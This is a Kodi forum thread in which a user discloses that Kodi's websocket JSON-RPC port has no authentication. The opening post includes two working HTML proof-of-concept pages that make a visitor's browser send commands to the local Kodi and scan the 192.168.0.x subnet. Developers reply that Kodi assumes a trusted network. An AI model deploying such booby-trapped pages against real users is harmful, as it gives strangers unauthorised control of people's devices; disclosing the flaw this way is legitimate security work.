Security, websockets & JSON-RPC

Security, websockets & JSON-RPC - Printable Version

+- Kodi Community Forum (https://forum.kodi.tv)
+-- Forum: Development (https://forum.kodi.tv/forumdisplay.php?fid=32)
+--- Forum: Kodi Application (https://forum.kodi.tv/forumdisplay.php?fid=93)
+---- Forum: JSON-RPC (https://forum.kodi.tv/forumdisplay.php?fid=174)
+---- Thread: Security, websockets & JSON-RPC (/showthread.php?tid=151926)

Security, websockets & JSON-RPC - ThePickler - 2013-01-13

I was a bit surprised by the lack of security features implemented in relation to Websockets and JSON-RPC, seems almost too easy to boobytrap a website.

Example:

Code:
<html>

<script language="javascript" type="text/javascript">

  var websocket = new WebSocket('ws://127.0.0.1:9090/jsonrpc');

  websocket.onopen = function(evt) { websocket.send('{"jsonrpc": "2.0", "method": "System.EjectOpticalDrive"}') };

</script>

</html>

Or if there's a media center with remote access enabled, lets scan the network.

Code:
<html>

<script language="javascript" type="text/javascript">

var local_ips = '192.168.0.';

function tryport(i) {

  console.log('trying ' + i)

  var websocket = new WebSocket('ws://' + local_ips + i + ':9090/jsonrpc');

  websocket.onopen = function(evt) { websocket.send('{"jsonrpc": "2.0", "method": "System.EjectOpticalDrive"}') };

}

for (var i=1; i<256; i++) {

  tryport(i);

};

</script>

</html>

Tested with Windows and Frodo RC3.

RE: Security, websockets & JSON-RPC - Mizaki - 2013-01-13

I expect that answer you'll get is: XBMC is not secure and is expected to run in a local (friendly) LAN.

RE: Security, websockets & JSON-RPC - Montellese - 2013-01-13

(2013-01-13, 17:02)Mizaki Wrote: I expect that answer you'll get is: XBMC is not secure and is expected to run in a local (friendly) LAN.

What he said. If you don't trust the people in your network, don't enable remote access. It's not only the websocket interface which has this lack of security, the TCP server is the same and if you don't set a password on the webserver, HTTP access is the same.

RE: Security, websockets & JSON-RPC - amanda91 - 2024-03-08

Implementing robust security measures is crucial when integrating websockets and JSON-RPC. Employing encryption protocols, secure authentication mechanisms, and regularly updating software can fortify the system against potential vulnerabilities. Prioritizing security ensures the reliability and confidentiality of communication, fostering a resilient websockets and JSON-RPC environment.

RE: Security, websockets & JSON-RPC - jbinkley60 - 2024-03-09

This has to be close to a new record, responding to an 11+ year old post.

Jeff

RE: Security, websockets & JSON-RPC - selfcontained - 2024-03-10

Even if it reads a bit "AI-ish".

RE: Security, websockets & JSON-RPC - jbinkley60 - 2024-03-10

(2024-03-10, 15:34)selfcontained Wrote: Even if it reads a bit "AI-ish".

Indeed. My thought exactly.

Jeff